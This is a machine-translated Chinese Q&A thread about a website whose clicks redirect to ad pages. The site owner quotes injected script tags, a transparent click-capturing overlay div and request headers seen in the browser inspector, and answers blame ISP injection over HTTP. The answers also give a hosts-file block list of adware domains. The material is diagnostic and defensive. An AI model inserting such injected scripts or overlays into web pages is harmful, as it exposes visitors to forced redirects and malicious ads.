问题: - 有时,点击NAVBAR菜单或我的bootstrap网站上的任何div,它会重定向到新标签中的广告或未知链接。
http://cobalten.com/afu.php?zoneid=1365143&var=1492756
从托管文件导入的链接: -
<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">
<script src="js/jquery.min.js"></script>
<script src="js/main.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<link rel="stylesheet" type="text/css" href="css\style.css">
<link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
crossorigin="anonymous">
<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>
我在检查中得到了什么: -
当我点击菜单上没有重定向时,我多次检查了我的代码..我发现没有任何可疑......但是当我点击链接重定向链接时,我在浏览器中检查了我的代码,我可以清楚地看到几个脚本源添加到我的文件(只能在浏览器的检查模式下查看)。它们不写入我的代码。我的代码的未知部分是..
1)HERE以下2个脚本正在替换head标记中的脚本js / jquery.min.js
<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&screenheight=768&screenwidth=1360&tm=1530041241377&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>
<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" type="text/javascript"></script>
2)在导入google api后,这个正被添加到body标签中
<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>
3)这个也是身体标签。
<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>
4)检查重定向链接。 HEADERS信息: -
Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644
我尝试了什么: -
我的代码很干净,没有脚本将它重定向到某个地方。它可能是我的浏览器或Windows被攻陷。我检查了3个浏览器的网站EDGE,CHROME,FIREFOX ..同样的问题。然后我从Win7升级到Windows 10并进行全新安装。但什么都没发生。然后我想到要求Hostgator支持如果服务器被泄露他们从他们的结束回复它...我安装了malwarebytes和所有软件来解决它...但他们只是通知chrome / firefox / Edge重定向到一些出站ID域名大多是go.oclasrv.com而什么都不做。
**
任何解决方案???
**
更新: -
我在Hostgator支持反馈链接上获得了类似的重定向..
注意到,这里字符串中的域名被rateus.in替换.zoneID = 1492761与我打开的任何不安全链接相同.. cb = xxxxxxxxxxxx和tm = xxxxxxxxxxx也针对不同的链接而改变而指纹= c2VwLW5vLXJlZGlyZWN0对于所有链接都是相同的打开。
<script async="" src="//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&screenheight=768&screenwidth=1360&tm=1530191489196&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>
<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag"></script>
<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>
我的操作系统完全升级到WIN10专业版,我只安装了Chrome而没有任何插件......
这个问题与浏览器无关,因为我在EDGE和Firefox上获得了相同的结果。
任何可以帮助我的JS专家
这似乎是ISP注入JavaScript文件的情况。您是否有机会使用BSNL宽带?最近几天,BSNL似乎在HTTP(非加密)网站上注入广告软件。
我知道的唯一解决方案是在https上托管您的网站或更改您的ISP。
您遇到的这个问题是服务器端问题。您的代码可能没有任何问题,但服务器感染了恶意软件,将这些错误代码注入您的网站。
为了解决这个问题,我会备份你编写的代码,更改你的FTP主机密码,擦除你的服务器,然后添加你的代码。如果这不能解决问题,那么我会改变主机提供商。
如果您看到从以下IP注入的未知脚本,那么它是由BSNL ISP注入的脚本文件。
61.0.245.90, 117.205.13.171
只有在访问HTTP网站时才会注入这些脚本。 HTTPS涉及传输层安全性,因此ISP无法对其进行篡改。
来自此IP的脚本文件只是一个管道,可以从不同的AD介质下载更多AD脚本。大多数AD媒体都是通过劫持用户点击鼠标来打开弹出窗口来进行侵入性广告。
BSNL此类活动的借口是,它是一项增强其订阅者浏览体验的功能。有一篇关于BSNL injecting such scripts的详细文章以及如何阻止这些文章。
接得好!
由于安全性差,BSNL服务器每天都已损坏或感染恶意软件/病毒
naganoadigei.com被明确注册以提供恶意软件并将用户重定向到网络钓鱼站点。
最近在2019年2月,他们已经解决了这个问题。但不幸的是,基于广告的重新定向的新版本在2019年2月发布的是humparsi.com
您可以访问Sucuri查看该网站是否已被感染
或者,您可以在DNS条目中阻止独立系统的传出请求
导航到%windir%\System32\drivers\etc并使用管理员授权以提升模式编辑hosts文件,并将这些行添加到hosts文件中
0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com
上述网站不受SSL保护
要阻止特定的IP地址,可以通过阻止防火墙中的传出边界来实现
为了减少影响或任何可能的不利影响,您可以通过安装附加组件来阻止JavaScript,例如NoScript或ScriptSafe和HTTPS Everywhere
要找出哪个应用程序使用分配了端口号的IP地址:
C:\Windows\system32>netstat -anob